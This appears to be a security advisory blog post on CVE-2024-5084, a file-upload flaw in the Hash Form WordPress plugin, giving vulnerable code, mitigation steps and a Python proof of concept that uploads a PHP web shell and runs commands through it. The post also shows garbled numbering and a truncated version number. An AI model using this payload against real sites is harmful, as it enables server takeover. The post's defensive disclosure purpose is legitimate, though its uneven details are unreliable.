CVE-2024-5084 - Critical RCE via Arbitrary File Upload in Hash Form – Drag & Drop Form Builder Plugin for WordPress
WordPress sites worldwide rely on plugins to save time and add powerful features. But sometimes, these plugins come with vulnerabilities that can put your entire website at risk. CVE-2024-5084 is one such vulnerability found in the Hash Form – Drag & Drop Form Builder plugin. In this post, we'll break down what this vulnerability is, how attackers can exploit it, and what you should do right now to keep your site safe.
What Is the Hash Form Plugin?
Hash Form – Drag & Drop Form Builder is a popular WordPress plugin that lets you easily create and manage forms using a visual, drag-and-drop interface. It’s used on thousands of websites for anything from contact forms to surveys.
What Is CVE-2024-5084?
CVE-2024-5084 is a critical security flaw affecting all versions of Hash Form up to and including 1.1.. Unauthenticated attackers can upload arbitrary files to your server—including PHP code—which can lead to full website takeover.
The Problem
The problem sits in this plugin's file_upload_action function. This function is designed to handle file uploads submitted through forms your visitors fill out. But, it fails to check the file type. That means an attacker can upload literally any file, even malicious PHP scripts.
Root Cause
The missing file type/extension validation allows any file to be processed and saved by the vulnerable function.
Original reported flaw:
Vulnerability reference:
- WPScan Advisory: wpscan.com/vulnerability/5084
- Patchstack Database
- NVD: CVE-2024-5084
Here's a simplified version of what the unsafe upload handler looked like
// Vulnerable function in the plugin
function file_upload_action() {
if (isset($_FILES['file'])) {
$uploaded_file = $_FILES['file'];
$target_path = ABSPATH . '/wp-content/uploads/' . basename($uploaded_file['name']);
// No file type check!
move_uploaded_file($uploaded_file['tmp_name'], $target_path);
echo "File uploaded!";
} else {
echo "No file!";
}
}
What’s missing?
There’s no check for allowed file extensions (.jpg, .png, etc.), so an attacker can upload a file like evil.php and it will be accepted.
The attacker accesses the script in the browser:
https://targetsite.com/wp-content/uploads/evil.php
6. The script runs, letting the attacker execute any command on the server—full remote code execution.
Exploit: Proof-of-Concept (PoC) Code
Below is a simple Python script demonstrating this exploit. (For educational use only!)
import requests
url = 'https://targetsite.com/path-to-form/'; # Change to vulnerable form URL
files = {
'file': ('evil.php', '<?php system($_GET["cmd"]); ?>', 'application/x-php'),
}
response = requests.post(url, files=files)
print('Upload response:', response.text)
# The attacker can now visit:
# https://targetsite.com/wp-content/uploads/evil.php?cmd=whoami
> Warning: Running exploits without permission is illegal.
Attackers can install malware, deface the website, steal information, or pivot to other servers.
## How To Fix / Mitigation
Upgrade to the latest version as soon as an update is available.
3. If no patch is out, replace file_upload_action with secure file upload code that only allows specific, safe file types:
$allowed_types = array('jpg', 'jpeg', 'png', 'gif', 'pdf');
$file_ext = pathinfo($uploaded_file['name'], PATHINFO_EXTENSION);
if (!in_array(strtolower($file_ext), $allowed_types)) {
die("Invalid file type!");
}
4. Review your wp-content/uploads directory for unknown, suspicious files—delete anything you didn’t upload.
References and Further Reading
- Official Plugin Page
- WPScan Advisory for CVE-2024-5084
- Patchstack Vulnerability Database - Hash Form
- OWASP Secure File Upload Guide
Final Thoughts
CVE-2024-5084 is easy to exploit, and the damage can be total. If you use Hash Form, check your sites now. Always validate and sanitize file uploads in custom plugins and themes.
Stay safe—keep your plugins up to date, and follow trusted security news!
Timeline
Published on: 05/23/2024 15:15:15 UTC
Last modified on: 06/04/2024 18:02:40 UTC